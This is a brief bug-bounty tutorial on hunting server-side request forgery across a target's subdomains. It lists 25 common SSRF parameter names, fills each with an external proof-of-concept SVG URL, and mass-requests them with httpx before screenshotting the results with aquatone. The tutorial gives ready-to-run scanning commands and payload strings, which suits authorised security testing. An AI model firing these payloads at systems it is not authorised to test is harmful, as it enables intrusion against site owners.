SSRF hunt with httpx & aquatone

Tools Used: Subfinder Sublister Httpx Aquatone Methodology: Find subdomains from any tool and save subdomains in domains.txt Here are top 25 parameters to test SSRF. (Note: You can add more parameters if you want to add them from any resource)

?dest={target} ?redirect={target} ?uri={target} ?path={target} ?continue={target} ?url={target} ?window={target} ?next={target} ?data={target} ?reference={target} ?site={target} ?html={target} ?val={target} ?validate={target} ?domain={target} ?callback={target} ?return={target} ?page={target} ?feed={target} ?host={target} ?port={target} ?to={target} ?out={target} ?view={target} ?dir={target} Add http://brutelogic.com.br/poc.svg in place of {target} Now the parameters would look like Eg: ?callback=http://brutelogic.com.br/poc.svg Now save all parameters in ssrf.txt Now run httpx Command: httpx -l /root/domains.txt -paths ssrf.txt -threads 200 -o ssrf-poc.txt All subdomains/target domains in domains,txt will append ssrf.txt parameters in the end along with payload in the urls and save results in ssrf-poc.txt Now run Aquatone Command: cat /root/ssrf-poc.txt | ./aquatone -out /root/screenshots If the website is vulnerabile it will make a request to the svg.poc and renders the domain name. SSRF to XSS maybe or a critical SSRF the aquatone report will confirm either the endpoint is vulnerable to SSRF or not. References: https://twitter.com/Alra3ees/status/1478188105060470785 https://github.com/KathanP19/HowToHunt/blob/master/SSRF/SSRF.md https://github.com/lutfumertceylan/top25-parameter/blob/master/ssrf-parameters.txt